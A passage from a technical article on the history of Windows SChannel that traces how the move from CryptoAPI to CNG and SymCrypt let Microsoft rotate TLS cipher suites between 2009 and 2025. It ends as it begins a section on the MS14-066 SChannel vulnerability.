&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\
  Protocols\
    SSL 2.0\Server\Enabled = 0xffffffff   ; ON by default on 2003 R2
    SSL 3.0\Server\Enabled = 0xffffffff
    TLS 1.0\Server\Enabled = 0xffffffff
    ; TLS 1.1 / 1.2 sub-keys absent -- those protocols do not exist on 2003 R2
  Ciphers\
    RC4 128/128\Enabled        = 0xffffffff
    RC4 56/128\Enabled         = 0xffffffff   ; export-grade, still present
    RC4 40/128\Enabled         = 0xffffffff   ; export-grade
    Triple DES 168\Enabled     = 0xffffffff
    DES 56/56\Enabled          = 0xffffffff
    RC2 40/128\Enabled         = 0xffffffff   ; export-grade
    NULL\Enabled               = 0
  Hashes\
    MD5\Enabled                = 0xffffffff
    SHA\Enabled                = 0xffffffff
  KeyExchangeAlgorithms\
    Diffie-Hellman\Enabled     = 0xffffffff
    PKCS\Enabled               = 0xffffffff   ; RSA key transport
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Notice what is &lt;em&gt;not&lt;/em&gt; there. No &lt;code&gt;TLS 1.1&lt;/code&gt;, no &lt;code&gt;TLS 1.2&lt;/code&gt;, no AES sub-key (AES &lt;code&gt;ALG_ID&lt;/code&gt; constants arrived in &lt;code&gt;rsaenh.dll&lt;/code&gt; via XP SP3 and Server 2003 SP2 but SChannel had to learn the suite-name strings separately). No ECC primitive &lt;em&gt;at all&lt;/em&gt; -- CryptoAPI 1.0 could not express named curve parameters in the &lt;code&gt;ALG_ID + key BLOB&lt;/code&gt; shape, so no amount of registry editing could unlock an ECDHE cipher suite on a 2003-era box. The four-sub-key layout (&lt;code&gt;Protocols&lt;/code&gt;, &lt;code&gt;Ciphers&lt;/code&gt;, &lt;code&gt;Hashes&lt;/code&gt;, &lt;code&gt;KeyExchangeAlgorithms&lt;/code&gt;) is the &lt;em&gt;configuration surface&lt;/em&gt;; what the surface can offer is bounded by the &lt;em&gt;substrate&lt;/em&gt; underneath it.&lt;/p&gt;
&lt;h3&gt;The CSP layer underneath: &lt;code&gt;PROV_RSA_SCHANNEL&lt;/code&gt; and &lt;code&gt;CALG_TLS1PRF&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;On the dispatch side of that same XP / 2003 box, SChannel relied on two CryptoAPI 1.0 Cryptographic Service Providers in particular. The Microsoft Learn &quot;Cryptographic Provider Types&quot; page enumerates the provider types Microsoft shipped [@ms-learn-cryptographic-provider-types]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;PROV_RSA_SCHANNEL&lt;/code&gt;&lt;/strong&gt; (provider type &lt;code&gt;12&lt;/code&gt;) -- the SChannel-private CSP. It carried the TLS-specific primitives: the &lt;code&gt;CALG_TLS1PRF&lt;/code&gt; pseudorandom function (algorithm identifier &lt;code&gt;0x0000800a&lt;/code&gt;), the &lt;code&gt;CALG_SCHANNEL_MASTER_HASH&lt;/code&gt; and &lt;code&gt;CALG_SCHANNEL_MAC_KEY&lt;/code&gt; and &lt;code&gt;CALG_SCHANNEL_ENC_KEY&lt;/code&gt; key-derivation handles, and (because the substrate had to negotiate three handshake protocols) the &lt;code&gt;CALG_SSL2_MASTER&lt;/code&gt; and &lt;code&gt;CALG_PCT1_MASTER&lt;/code&gt; constants documented on the Microsoft Learn &lt;code&gt;ALG_ID&lt;/code&gt; page [@ms-learn-alg-id].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;PROV_RSA_FULL&lt;/code&gt; / &lt;code&gt;PROV_RSA_AES&lt;/code&gt; (&lt;code&gt;rsaenh.dll&lt;/code&gt;)&lt;/strong&gt; -- the general-purpose enhanced CSP, which carried the bulk symmetric primitives the cipher list named (&lt;code&gt;CALG_RC4&lt;/code&gt;, &lt;code&gt;CALG_DES&lt;/code&gt;, &lt;code&gt;CALG_3DES&lt;/code&gt;, eventually &lt;code&gt;CALG_AES_128&lt;/code&gt;, &lt;code&gt;CALG_AES_256&lt;/code&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Both CSPs were loaded by &lt;code&gt;CryptAcquireContext&lt;/code&gt; against the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider&lt;/code&gt; registry hierarchy. Neither was extensible without an &lt;code&gt;rsaenh.dll&lt;/code&gt; (or analogous) revision and a CSP-rev ship cycle. The registry hive let an operator turn primitives off; it could not let an operator turn a &lt;em&gt;new&lt;/em&gt; primitive on, because the CSP catalog itself was the menu. Adding ECC to that menu was not a configuration problem -- it required a different substrate.&lt;/p&gt;
&lt;h3&gt;The &lt;code&gt;SSL Cipher Suite Order&lt;/code&gt; GPO -- and why it is a Vista-era artifact, not a 2003-era one&lt;/h3&gt;
&lt;p&gt;Cipher-suite &lt;em&gt;ordering&lt;/em&gt; (as opposed to &lt;em&gt;enablement&lt;/em&gt;) was not exposed as an administrative tunable until Windows Vista and Server 2008 added the &lt;code&gt;Computer Configuration &amp;gt; Administrative Templates &amp;gt; Network &amp;gt; SSL Configuration Settings &amp;gt; SSL Cipher Suite Order&lt;/code&gt; Group Policy. The current Microsoft Learn &quot;Manage Transport Layer Security (TLS)&quot; page documents the format verbatim: &quot;a strict comma delimited format. Each cipher suite string ends with a comma to the right side of it... the list of cipher suites is limited to 1,023 characters.&quot; [@ms-learn-manage-tls] A representative XP-era ordering string -- if the GPO had existed for the operator to set -- would have read something like &lt;code&gt;TLS_RSA_WITH_RC4_128_SHA,TLS_RSA_WITH_3DES_EDE_CBC_SHA,TLS_RSA_WITH_DES_CBC_SHA,...&lt;/code&gt;, walking the actual Server 2003 default lineup that the CSP catalog could deliver. The fact that this lever did not exist on 2003 -- the operator was limited to flipping &lt;code&gt;Ciphers\&amp;lt;name&amp;gt;\Enabled&lt;/code&gt; DWORDs in the per-cipher sub-tree -- is itself evidence of how the &lt;em&gt;operator-facing&lt;/em&gt; SChannel surface matured one Windows release at a time.&lt;/p&gt;
&lt;h3&gt;No enumeration tool on Server 2003&lt;/h3&gt;
&lt;p&gt;There is no &lt;code&gt;Get-TlsCipherSuite&lt;/code&gt; cmdlet on Windows Server 2003. Windows PowerShell itself only shipped (as KB968930) in 2009, and the &lt;code&gt;TLS&lt;/code&gt; PowerShell module first appeared in Windows 8 and Server 2012 [@ms-learn-get-tlsciphersuite]. On a 2003-era box the empirical answer to &quot;what does this server actually negotiate?&quot; was either a &lt;code&gt;reg query &quot;HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Server&quot; /v Enabled&lt;/code&gt; against the registry sub-tree above, or -- for what the &lt;em&gt;client&lt;/em&gt; actually picked -- an outbound Internet Explorer 6 trace, or -- for what the &lt;em&gt;server&lt;/em&gt; actually accepted -- a TCP-connect dump against port 443 with a TLS scanner of the era (typically &lt;code&gt;openssl s_client -connect host:443 -cipher ALL&lt;/code&gt; running on a separately-administered Linux box). The operator-visible inventory tool an admin reaches for in 2026 is itself a CNG-era artifact.&lt;/p&gt;
&lt;h3&gt;The agility split: configuration vs. substrate&lt;/h3&gt;
&lt;p&gt;Here is the structural problem that XP-era SChannel revealed. The configuration surface was getting more agile -- an operator could turn cipher suites on and off, prefer one over another, disable an entire protocol version -- but the &lt;em&gt;engine&lt;/em&gt; underneath was not. New primitives still required a CSP rev. New named curves were unrepresentable. SHA-256 in TLS handshake signatures was a several-year project.&lt;/p&gt;
&lt;p&gt;A useful metaphor: configuration agility without substrate agility is a treadmill. You can disable bad cipher suites at will. You cannot &lt;em&gt;add&lt;/em&gt; a new family of primitives without rebuilding the engine. By the mid-2000s Microsoft had two options. Patch CAPI in place forever -- absorb every new algorithm as a new &lt;code&gt;ALG_ID&lt;/code&gt; constant, a new CSP DLL, a new BLOB type, a new round of partner re-certification. Or ship a successor.&lt;/p&gt;

Every Microsoft technology that needed cryptography was caught in the same trap as SChannel. IPsec, EFS, BitLocker&apos;s predecessors, S/MIME in Outlook, smart-card login, Authenticode code-signing verification -- all dispatched through CryptoAPI 1.0 CSPs. The agility problem was not localised to TLS; it was the *Windows cryptography* problem. The successor Microsoft built would therefore have to be the substrate for *all* of these consumers, not just for SChannel. That is exactly what CNG ended up being.
&lt;p&gt;They chose the second. The next section is the eureka moment the rest of the article hangs on.&lt;/p&gt;
&lt;h2&gt;4. CNG: Where Vista Made Algorithm Agility First-Class (January 2007)&lt;/h2&gt;
&lt;p&gt;Vista is where the article&apos;s clock starts. In January 2007 Microsoft did not patch CryptoAPI 1.0; it shipped a parallel substrate alongside it: &lt;strong&gt;Cryptography API: Next Generation&lt;/strong&gt;. The Microsoft Learn portal still describes it in one sentence that doubles as the article&apos;s thesis: &quot;CNG is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.&quot; [@ms-learn-cng-portal]&lt;/p&gt;

CNG is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior. -- Microsoft Learn, *Cryptography API: Next Generation* portal [@ms-learn-cng-portal]
&lt;p&gt;The two splits that look prosaic in the documentation -- BCrypt for primitives, NCrypt for key custodians -- are, in fact, the single architectural decision that makes the rest of this article&apos;s twenty-year story possible.&lt;/p&gt;

The post-Vista replacement for CryptoAPI 1.0. CNG splits cryptography into two API surfaces. **BCrypt** (`bcrypt.dll`) handles primitive operations (hashes, ciphers, key-agreement, signing) and addresses algorithms by string identifier through `BCryptOpenAlgorithmProvider`. **NCrypt** (`ncrypt.dll`) handles key storage and custody through pluggable Key Storage Providers (KSPs). CNG is the substrate Microsoft built so that every later cryptographic primitive could be added as a provider update rather than an API rewrite [@ms-learn-cng-portal].
&lt;h3&gt;BCrypt: algorithms become strings&lt;/h3&gt;
&lt;p&gt;The shape of the BCrypt API is the eureka moment.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;BCRYPT_ALG_HANDLE hAlg;
NTSTATUS status = BCryptOpenAlgorithmProvider(
    &amp;amp;hAlg,
    BCRYPT_AES_ALGORITHM,       // string identifier
    NULL,                        // default provider
    0);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;BCRYPT_AES_ALGORITHM&lt;/code&gt; is the literal string &lt;code&gt;&quot;AES&quot;&lt;/code&gt;. The handle returned by &lt;code&gt;BCryptOpenAlgorithmProvider&lt;/code&gt; does not encode which DLL implements AES; it encodes the &lt;em&gt;contract&lt;/em&gt; that the resulting handle satisfies (block cipher, configurable mode, configurable key length). The same shape later admits &lt;code&gt;BCRYPT_ECDH_P256_ALGORITHM&lt;/code&gt;, &lt;code&gt;BCRYPT_SHA384_ALGORITHM&lt;/code&gt;, &lt;code&gt;BCRYPT_CHACHA20_POLY1305_ALG_HANDLE&lt;/code&gt;, and -- in 2024-2026 -- &lt;code&gt;BCRYPT_MLKEM_ALG_HANDLE&lt;/code&gt; with parameter-set selectors such as &lt;code&gt;BCRYPT_MLKEM_PARAMETER_SET_768&lt;/code&gt; [@ms-learn-cng-mlkem-examples].&lt;/p&gt;
&lt;p&gt;&lt;code&gt;BCRYPT_MLKEM_ALG_HANDLE&lt;/code&gt; resolves through the exact same hash-table lookup as &lt;code&gt;BCRYPT_AES_ALGORITHM&lt;/code&gt; did in 2007. The substrate did not need an architectural change to absorb a brand-new algorithm family seventeen years later -- the dispatch was already built for it.&lt;/p&gt;
&lt;h3&gt;NCrypt: key custodians become pluggable&lt;/h3&gt;

**BCrypt** is the CNG API for *primitives* -- arithmetic that takes plaintext and a key and returns ciphertext (or hash, or signature). **NCrypt** is the CNG API for *key custodians* -- objects that own a private key and expose only signing, decryption, and key-derivation operations. The split lets a TLS server hold a private key whose material it never sees: SChannel calls `NCryptSignHash` against an `NCRYPT_KEY_HANDLE`, and the handle&apos;s owning KSP (software, smart card, or TPM) performs the operation in its own trust boundary.

A CNG-loadable module that owns the lifecycle and operations of a private key. Microsoft ships three out of the box: the **Microsoft Software KSP** (keys at rest in the user or machine profile, protected by DPAPI), the **Microsoft Smart Card KSP** (keys on a PIV / CCID device), and the **Microsoft Platform Crypto Provider** (keys non-exportable from the TPM 2.0). Third parties ship KSPs for HSMs and cloud KMS systems. SChannel sees only the `NCRYPT_KEY_HANDLE`; the custodian is opaque to the SSP.
&lt;h3&gt;How SChannel uses CNG&lt;/h3&gt;
&lt;p&gt;After Vista, SChannel&apos;s internals look very different. The cipher-suite registry resolves to BCrypt algorithm identifiers rather than &lt;code&gt;ALG_ID&lt;/code&gt; constants. The credentials handle that an IIS worker process receives from &lt;code&gt;AcquireCredentialsHandle&lt;/code&gt; holds an &lt;code&gt;NCRYPT_KEY_HANDLE&lt;/code&gt; for the server certificate&apos;s private key; signing operations during the handshake (CertificateVerify) dispatch through &lt;code&gt;NCryptSignHash&lt;/code&gt; to whichever KSP owns the key.&lt;/p&gt;

flowchart TD
    A[&quot;IIS / SQL Server / SslStream / WinHTTP&quot;] --&amp;gt; B[SChannel SSP -- schannel.dll]
    B --&amp;gt; C[&quot;BCrypt -- bcrypt.dll&quot;]
    B --&amp;gt; D[&quot;NCrypt -- ncrypt.dll&quot;]
    C --&amp;gt; E[&quot;SymCrypt primitive engine&quot;]
    C --&amp;gt; F[&quot;Third-party BCrypt providers&quot;]
    D --&amp;gt; G[Microsoft Software KSP]
    D --&amp;gt; H[Smart Card KSP]
    D --&amp;gt; I[&quot;Microsoft Platform Crypto Provider -- TPM 2.0&quot;]
    D --&amp;gt; J[&quot;HSM / cloud KMS KSPs&quot;]
    E --&amp;gt; K[(Algorithm dispatch by string identifier)]
    G --&amp;gt; L[(Key operations by opaque handle)]
&lt;h3&gt;The agility property, stated forward&lt;/h3&gt;
&lt;p&gt;From 2007 onward, &lt;strong&gt;adding a primitive to Windows TLS is a CNG-provider-update problem, not an SChannel-rewrite problem&lt;/strong&gt;. The application surface stays put. IIS does not get rebuilt. &lt;code&gt;SslStream&lt;/code&gt; does not change. The cipher suite negotiated on the wire is whatever the SChannel cipher-suite registry currently exposes; the cipher-suite registry resolves to whatever BCrypt providers are loaded.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Algorithm agility is not a property of TLS-the-protocol. The cipher-suite codepoint is the minor half of the work; the major half is having a substrate that resolves a new algorithm identifier without rebuilding every consumer. CNG&apos;s BCrypt dispatch is what that substrate looks like in Windows. The protocol&apos;s cipher-suite registry is &lt;em&gt;enumerated&lt;/em&gt;; the substrate&apos;s algorithm registry is &lt;em&gt;open&lt;/em&gt;. That asymmetry is the entire game.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;SymCrypt as the parallel track&lt;/h3&gt;

Microsoft&apos;s unified, FIPS 140-validated cryptographic primitive engine. Niels Ferguson began the project in **late 2006** with the first sources committed in February 2007 [@symcrypt-github] -- nearly a decade before Heartbleed. SymCrypt became the primary library for symmetric algorithms starting with Windows 8 and the primary library for all algorithms across Windows since the Windows 10 1703 release in March 2017. Microsoft open-sourced SymCrypt under the MIT license in July 2019 [@symcrypt-github]. Its release-by-release primitive timeline lives in the public CHANGELOG [@symcrypt-changelog].
&lt;p&gt;This timing matters because the original framing many readers carry around -- &quot;Microsoft rewrote its crypto engine after Heartbleed&quot; -- is historically wrong on every axis. SymCrypt predates Heartbleed by seven years [@symcrypt-github]. Heartbleed was an OpenSSL heartbeat-extension bug and did not affect SChannel because SChannel does not implement that code path [@nvd-cve-2014-0160]. The article&apos;s Section 6 treats this conflation in detail. For now, the honest framing is: SymCrypt was the long, quiet maturation of CNG&apos;s primitive layer over a decade, designed by a working Microsoft cryptographer for a substrate already built to accept it.Niels Ferguson&apos;s publicly visible work -- including his co-authorship of &lt;em&gt;Cryptography Engineering&lt;/em&gt; with Bruce Schneier and Tadayoshi Kohno [@schneier-cryptography-engineering] -- is the closest the public has to a primitive-design rationale for what eventually became SymCrypt.&lt;/p&gt;
&lt;p&gt;CNG was Microsoft betting that Windows could keep its Win32 API contract stable while every cryptographic primitive underneath it rotated. The next four sections are the receipts on that bet -- five complete cipher-suite rotations, a parsing-path RCE that almost broke trust in the substrate, and a present-day post-quantum pivot that is the cleanest agility receipt of all.&lt;/p&gt;
&lt;h2&gt;5. Five Generations of Cipher-Suite Rotation, 2009 to 2025&lt;/h2&gt;
&lt;p&gt;Between Windows 7 in 2009 [@ms-learn-tls-cipher-suites-windows-7] and the rolling Windows Server 2022 / 2025 default lists [@ms-learn-tls-cipher-suites-server-2022], Microsoft rotated every primitive in SChannel&apos;s default cipher list at least five times. Not once did IIS, SQL Server, or &lt;code&gt;SslStream&lt;/code&gt; get a source-code change because of it. Those five rotations are the agility receipts.&lt;/p&gt;
&lt;p&gt;The rough shape of the rotations:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Window&lt;/th&gt;
&lt;th&gt;New primitive(s)&lt;/th&gt;
&lt;th&gt;Old primitive(s) retired&lt;/th&gt;
&lt;th&gt;Disablement mechanism&lt;/th&gt;
&lt;th&gt;Cryptographic indictment&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;G1&lt;/td&gt;
&lt;td&gt;Win7 / 2008 R2, Oct 2009&lt;/td&gt;
&lt;td&gt;ECDHE key exchange + AES-GCM AEAD&lt;/td&gt;
&lt;td&gt;Static RSA key transport + AES-CBC + HMAC&lt;/td&gt;
&lt;td&gt;New cipher-suite registrations [@ms-learn-tls-cipher-suites-windows-7]&lt;/td&gt;
&lt;td&gt;Lucky13 (2013), BEAST (2011) [@beast-pdf]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G2&lt;/td&gt;
&lt;td&gt;KB2868725, Nov 12 2013 -&amp;gt; off-default 2016&lt;/td&gt;
&lt;td&gt;(none added)&lt;/td&gt;
&lt;td&gt;RC4 stream cipher&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SCH_USE_STRONG_CRYPTO&lt;/code&gt; registry value [@ms-advisory-2868725]&lt;/td&gt;
&lt;td&gt;RC4 NOMORE (75-hour cookie recovery) [@usenix-rc4nomore]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G3&lt;/td&gt;
&lt;td&gt;Win10 v1903, May 2019 Update&lt;/td&gt;
&lt;td&gt;(none added)&lt;/td&gt;
&lt;td&gt;3DES (64-bit block)&lt;/td&gt;
&lt;td&gt;Cipher-suite default-off in cipher list [@ms-learn-cipher-suites-schannel]&lt;/td&gt;
&lt;td&gt;SWEET32 (785 GB / less than 48 h) [@sweet32-info]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G4&lt;/td&gt;
&lt;td&gt;2016-2022&lt;/td&gt;
&lt;td&gt;SHA-256 / SHA-384 handshake signatures&lt;/td&gt;
&lt;td&gt;SHA-1 handshake signatures and SHA-1 trust-store roots&lt;/td&gt;
&lt;td&gt;Microsoft Trusted Root Program distrust events; chain-engine policy&lt;/td&gt;
&lt;td&gt;SHAttered (Feb 2017) [@iacr-eprint-shattered]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G5&lt;/td&gt;
&lt;td&gt;2020-2025&lt;/td&gt;
&lt;td&gt;TLS 1.3 (default-on Win11 / Server 2022)&lt;/td&gt;
&lt;td&gt;TLS 1.0 and TLS 1.1&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SCHANNEL\Protocols\TLS 1.0\&amp;lt;role&amp;gt;\DisabledByDefault&lt;/code&gt; [@ms-learn-tls-registry-settings]&lt;/td&gt;
&lt;td&gt;Decade of attack research (BEAST, POODLE, FREAK, Logjam) [@weakdh-logjam]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Each row below adds the engineering detail that the table compresses.&lt;/p&gt;
&lt;h3&gt;G1 -- ECDHE plus AES-GCM (Windows 7 / Server 2008 R2, October 2009)&lt;/h3&gt;

A key-agreement protocol where both parties generate a fresh elliptic-curve key pair for every handshake and exchange public points; the shared secret is never derived from the long-term server certificate&apos;s private key. ECDHE provides **forward secrecy**: compromising the server&apos;s RSA or ECDSA private key tomorrow does not let an adversary decrypt connections recorded today. ECDHE cipher suites first appear in SChannel on Windows 7 / Server 2008 R2 in 2009 [@ms-learn-tls-cipher-suites-windows-7].

A construction that encrypts plaintext and produces an authentication tag in a single operation, with neither output usable in isolation. AEAD ends an entire class of &quot;mac-then-encrypt vs. encrypt-then-mac&quot; padding-oracle bugs (Lucky13, POODLE-style attacks on CBC) by removing the separable padding step entirely. The AEAD framework is introduced in RFC 5246 §6.2.3.3 [@rfc-5246]; AES-GCM is the canonical instantiation on Windows.
&lt;p&gt;The Windows 7 cipher-suite roster enumerates ECDHE-based suites like &lt;code&gt;TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256&lt;/code&gt; and the AES-GCM AEAD suites &lt;code&gt;TLS_RSA_WITH_AES_256_GCM_SHA384&lt;/code&gt; and &lt;code&gt;TLS_RSA_WITH_AES_128_GCM_SHA256&lt;/code&gt; [@ms-learn-tls-cipher-suites-windows-7]. These suites simply did not exist in the SChannel cipher-suite list of XP / Server 2003. Microsoft was able to add them because the CNG substrate, two years old by Windows 7&apos;s RTM, dispatched algorithms by string; the cipher-suite registry just gained new rows that resolved to &lt;code&gt;BCRYPT_ECDH_P256_ALGORITHM&lt;/code&gt; and &lt;code&gt;BCRYPT_AES_ALGORITHM&lt;/code&gt; with the GCM chaining mode set.&lt;/p&gt;
&lt;h3&gt;G2 -- RC4 deprecation (KB2868725, November 12 2013, default-off 2016)&lt;/h3&gt;
&lt;p&gt;In November 2013 Microsoft published Security Advisory 2868725, &quot;Update for Disabling RC4,&quot; which introduced the &lt;code&gt;SCH_USE_STRONG_CRYPTO&lt;/code&gt; flag in the &lt;code&gt;SCHANNEL_CRED&lt;/code&gt; structure and the matching registry mechanism [@ms-advisory-2868725]. The press around the advisory was driven by the BEAST attack (2011) -- whose practical mitigation had been to &lt;em&gt;prefer&lt;/em&gt; RC4 over CBC suites to dodge the CBC implicit-IV bug -- and by mounting attacks against RC4 itself by AlFardan et al. and others.&lt;/p&gt;
&lt;p&gt;The full cryptographic indictment landed at USENIX Security in August 2015: Mathy Vanhoef and Frank Piessens published &quot;All Your Biases Belong to Us: Breaking RC4 in WPA-TKIP and TLS,&quot; demonstrating a 75-hour HTTPS cookie recovery against RC4-secured TLS [@usenix-rc4nomore]. Six months earlier, Andrei Popov of Microsoft Corp. had authored RFC 7465, &quot;Prohibiting RC4 Cipher Suites&quot; [@rfc-7465]. Edge and IE 11 disabled RC4 by default in late 2016; SChannel&apos;s RC4 suites moved to off-by-default on the same trajectory [@ms-learn-cipher-suites-schannel].RFC 7465 (&quot;Prohibiting RC4 Cipher Suites in TLS&quot;) was authored by A. Popov of Microsoft Corp. [@rfc-7465] -- the same engineer whose name is on the current Microsoft Learn SChannel SSP overview page [@ms-learn-schannel-ssp]. Microsoft&apos;s anti-RC4 push was Microsoft-led at the IETF, not just internally.&lt;/p&gt;
&lt;h3&gt;G3 -- 3DES retirement (Windows 10 v1903, May 2019 Update)&lt;/h3&gt;
&lt;p&gt;The cryptographic indictment for 3DES is a textbook example of the &lt;strong&gt;block-cipher birthday bound&lt;/strong&gt;. A 64-bit block cipher reaches a 50% probability of an internal collision after roughly $2^{32}$ encrypted blocks under a single key -- around 32 GB. The SWEET32 paper (Bhargavan and Leurent, ACM CCS 2016) translated that bound into a practical TLS cookie-recovery attack: with 785 GB of induced HTTP traffic over a long-lived 3DES-encrypted connection, an adversary could recover an HTTPS cookie in less than two days [@sweet32-info].&lt;/p&gt;
&lt;p&gt;Microsoft moved 3DES cipher suites to off-by-default starting with &lt;strong&gt;Windows 10 version 1903 (May 2019 Update)&lt;/strong&gt;. The exact pivot is visible in the per-OS Microsoft Learn cipher-suite tables: &lt;code&gt;TLS_RSA_WITH_3DES_EDE_CBC_SHA&lt;/code&gt; appears in the default-enabled list for Windows 10 v1709 and was removed from the default-enabled list for v1903 onward [@ms-learn-cipher-suites-schannel][@ms-learn-tls-cipher-suites-server-2022]. The registry-toggle mechanism is the same &lt;code&gt;SCHANNEL\Ciphers\&amp;lt;algorithm&amp;gt;\Enabled&lt;/code&gt; shape that has been in place since the XP era [@ms-learn-tls-registry-settings]. Crucially, no application changed -- IIS, SQL Server, and &lt;code&gt;SslStream&lt;/code&gt; simply stopped negotiating 3DES because the cipher list no longer offered it.&lt;/p&gt;
&lt;h3&gt;G4 -- SHA-1 sunset (2016 to 2022)&lt;/h3&gt;
&lt;p&gt;SHA-1 deprecation in SChannel was not a single registry flip; it was a coordinated rotation across the &lt;strong&gt;certificate trust pipeline&lt;/strong&gt; (covered in Section 7), the &lt;strong&gt;handshake signature suite&lt;/strong&gt;, and the &lt;strong&gt;trust-store membership&lt;/strong&gt; of root CAs that issued SHA-1 leaves. Two cryptographic indictments did the load-bearing work. The first was &lt;em&gt;protocol-level&lt;/em&gt;: SLOTH (Bhargavan and Leurent, NDSS 2016 [@mitls-sloth][@iacr-eprint-sloth]) showed that an attacker able to compute MD5 or SHA-1 transcript-hash collisions could impersonate one party to the other inside TLS 1.2&apos;s client-authenticated handshake by forging matching &lt;code&gt;CertificateVerify&lt;/code&gt; signatures -- a direct attack on authentication, not on the primitive&apos;s collision resistance in the abstract. The second was &lt;em&gt;primitive-level&lt;/em&gt;: SHAttered (Stevens, Bursztein, Karpman, Albertini, Markov; February 2017 [@iacr-eprint-shattered]) supplied the concrete colliding PDF pair that closed the public debate about SHA-1&apos;s safety margin, published as IACR ePrint 2017/190. Two indictments together -- protocol-level via SLOTH, primitive-level via SHAttered -- is the empirically-correct framing for the SHA-1 retirement timeline.&lt;/p&gt;
&lt;p&gt;For SChannel specifically the rotation was: SHA-256 / SHA-384 handshake signatures for new connections; chain-engine policy stops accepting SHA-1 leaves for &lt;code&gt;id-kp-serverAuth&lt;/code&gt;; and the Microsoft Trusted Root Program distrust events that retired SHA-1 code-signing and TLS certificates from &lt;code&gt;authrootstl.cab&lt;/code&gt; over 2016 to 2022. Section 7 walks the trust pipeline in detail; for the agility argument what matters is that none of these required an &lt;code&gt;SslStream&lt;/code&gt; change.&lt;/p&gt;
&lt;h3&gt;G5 -- TLS 1.0 / 1.1 disablement (2020 to 2025)&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s rollout used the registry pattern from Section 3. Per-application disablement first -- IE 11, Edge legacy, .NET via &lt;code&gt;ServicePointManager.SecurityProtocol&lt;/code&gt;, individual server roles -- then OS-level defaults in 2024 and 2025 [@ms-learn-tls-registry-settings]. The TLS 1.0 / 1.1 lifecycle is the article&apos;s clearest data point on the difference between &quot;the substrate can rotate&quot; and &quot;the world will move&quot; (Section 11 returns to this).&lt;/p&gt;
&lt;p&gt;The TLS 1.3 side of G5 -- the &lt;em&gt;positive&lt;/em&gt; half of the protocol-version rotation -- shipped default-on in Windows Server 2022 (GA August 2021) and Windows 11 (GA October 5, 2021). Windows 10 and Server 2019 SChannel remain TLS 1.2 only [@ms-learn-tls-cipher-suites-server-2022]. The three TLS 1.3 AEAD suites (&lt;code&gt;TLS_AES_128_GCM_SHA256&lt;/code&gt;, &lt;code&gt;TLS_AES_256_GCM_SHA384&lt;/code&gt;, &lt;code&gt;TLS_CHACHA20_POLY1305_SHA256&lt;/code&gt;) [@rfc-8446] became the default lineup -- another row of new entries in the cipher-suite registry, with the BCrypt providers behind them already shipping.&lt;/p&gt;
&lt;p&gt;Five rotations, zero application source changes. But one episode from the same era &lt;em&gt;did&lt;/em&gt; break the calm -- a parsing-path remote code execution in SChannel itself, published on Patch Tuesday in November 2014, that the press still routinely confuses with Heartbleed [@ms14-066]. The agility substrate did not protect Windows from that one.&lt;/p&gt;
&lt;h2&gt;6. MS14-066 / WinShock: What Happened, What It Was Not&lt;/h2&gt;
&lt;p&gt;If you searched &quot;SChannel 2014 vulnerability&quot; in late 2014 you got two stories blended together: Heartbleed (April) and the November SChannel RCE everyone called WinShock. They are not the same story. They are not the same vulnerability. They are not even the same vendor. The blending is the single most-misremembered SChannel event, and this article exists in part to set the record straight.&lt;/p&gt;
&lt;h3&gt;What MS14-066 actually was&lt;/h3&gt;
&lt;p&gt;On Patch Tuesday, November 11, 2014, Microsoft published &lt;strong&gt;Security Bulletin MS14-066&lt;/strong&gt; -- &quot;Vulnerability in Schannel Could Allow Remote Code Execution (2992611)&quot; [@ms14-066]. The vulnerability identifier was CVE-2014-6321. The bulletin&apos;s first sentence reads, verbatim:&lt;/p&gt;

This security update resolves a privately reported vulnerability in the Microsoft Secure Channel (Schannel) security package in Windows. The vulnerability could allow remote code execution if an attacker sends specially crafted packets to a Windows server. -- Microsoft Security Bulletin MS14-066, November 11, 2014 [@ms14-066]
